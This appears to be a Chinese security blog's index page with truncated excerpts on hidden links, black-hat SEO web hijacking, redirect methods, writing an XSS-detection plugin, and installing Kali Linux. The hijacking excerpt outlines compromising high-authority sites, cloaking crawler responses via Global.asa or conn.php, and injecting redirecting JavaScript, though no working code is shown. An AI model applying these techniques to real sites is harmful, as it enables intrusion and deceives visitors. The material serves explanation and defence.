;">暗链</a>分析：最初级的隐蔽链接，易被搜索引擎察觉。posit ...继续阅读 (32)

网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式，此手法往往通过入侵政府、教育机构网站（权重高），修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等；表现形式可以是劫持跳转，也可以是劫持呈现的网页内容，目前被广泛应用于私服、博彩等暴利行业。服务端劫持服务端劫持也称为全局劫持，手法为修改网站动态语言文本，判断访问来源控制返回内容，从来达到网站劫持的目的。asp/aspx/php劫持Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊，作用是在每次执行一个动态脚本的时候，都会先加载该脚本， 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码（访问来源等），如果是蜘蛛访问则返回关键词网页（想要推广的网站），如果是用户访问，则返回正常页面。客户端劫持客户端劫持的手法也很多，但主要就是2种：js劫持、Header劫持。js劫持js劫持目的：通过向目标网页植入恶意js代码，控制网站跳转、隐藏页面内容、窗口劫持等。js植入手法：可以通过入侵服务器，直接写入源代码中；也可以写在数据库中，因为有些页面会呈现数据库内容。js劫持案例效果：通过搜索引擎搜索点击页面（执行一段js）跳转到博彩页面；直接输入网址访问网页，跳转到404页面。代码：tod ...继续阅读 (24)

想要更深入地了解黑帽SEO，就必须先了解关于网站的一些基础知识，以及黑帽SEO常见的作弊手法。（可以参考：黑帽SEO–基础知识）其中页面跳转便是作弊手法之一，最近我收集了一些关于页面跳转的相关内容，在此汇总分享。页面跳转分类（一）服务端跳转一般用户不会感觉到跳转的实际行为，往往通过代码去控制，因此有些时候我们也不叫做跳转。具体的服务端跳转行为有很多，各个语言技术都有各自的特点。（二）客户端跳转客户端跳转分为：http层跳转，应用层跳转。应用层跳转分为：html head跳转，js跳转等。http层跳转http跳转是指server根据工作情况通过http返回状态码，利用http的重定向协议指示客户端浏览器跳转到相应页面的过程，一般返回码是302。html head跳转（HTML refresh）在html代码的head中添加特殊标签，如下<meta http-equiv="refresh" content="5"; url="http://thief.one/" />表示：5秒之后转到One Thief首页，这个跳转需要浏览器具体解析html后采能进行。js跳转通过在html代码中添加js代码，通过js代码实现跳转：<script language="javascript" type="text/javascript"> window.location.hre ...继续阅读 (46)

前言：‍‍‍‍还记得刚玩Web安全时，就想着要是能有一个自动挖掘XSS漏洞的软件就好了。然后我发现了Safe3、JSky、AWVS、Netsparker等等，但是误报太多，而且特别占内存。后来发现了fiddler的一个插件也可以检测当前浏览的页面是否存在XSS，但是不利于查看。于是就有了本文。‍‍‍‍本文将从每段代码，每个步骤讲解“如何自己写一个自动检测网页是否存在XSS”的插件。‍‍‍‍0×01 构思很重要：我现在是在做前端，学了那么久。教会了我一件事，就是干活之前先构思好、规划好。只需要大体的说下就下，比如这个插件，我先是在本子上写了下面的计划：(一)获取当前网站的URL(二)获取参数，并对其格式化为二维数组，有助于后面的获取，格式如下：[        [参数,值], [参数,值] ]（后来因发现会使代码臃肿，就放弃了这个想法）(三)对“值”与“唯一标识符”拼接。(四)Ajax对当前网页的URL发送数据。(五)返回200状态码后，进行查找“唯一标识符”。(六)查找成功后，发送到服务器端。构思，并不是后面代码就必须遵守。只是给出一个可行的方案，然后在这个方案上优化一下。我现在的网页是http://test.cn/?a=1&b=2&c=3，后面就根据这个URL来进行 ...继续阅读 (38)

镇楼神图开篇语笔者曾在回家之前写了一篇寒假规划，里面有提到家里的老电脑，准备尝试各种各样的系统，然后现在已经回家八天了。但是其实前天才开始把老电脑的window XP 系统换成 昨天的临时使用系统Windows10 今天中午十二点起来，先去塘堤上一边晒太阳，一边把《算法导论》和《计算机网络技术及其应用》的书都看了一章多点。之后对面邻居家的姐姐来我们家坐坐，作为目前家里在家的唯一男丁，我好歹也是要抛头露面一下的。所以之后就回家了。然后在家实在刚不住，就开始准备把昨天下载好的七八个系统一个个的试试效果。在纠结了第一个系统到底用哪个半个小时之后，我还是选择了Kali Linux，没办法，这一款系统的名气虽然不是很大，但是其功能，尤其是安全方面的功能，简直令人发指。国内亲切的称呼这个系统的主要作用的是安全审计，但是其实这个系统就是妥妥的一个黑客定制版系统嘛！下面我把今天装机的一些图片放出来给大家伙看下。正文装机过程其实特别简单。这个系统十分干脆，没有那么多的磨磨蹭蹭的设置。做成启动盘之后，只要按部就班的一个enter以及几个有限的字符输入进入，你就可以享受到这个炫酷狂拽叼炸天的系统了。当然，我是无福消受，基本不会用里面的工具。工具集装机过程包括：下载镜像文件；制作启动盘；安装系统三步，下面容我一一介绍：一、下载镜像文件，欢迎大家去我们学校的镜像站。欢迎访问华中科技大学开源镜像站镜像站内部进 ...继续阅读 (18)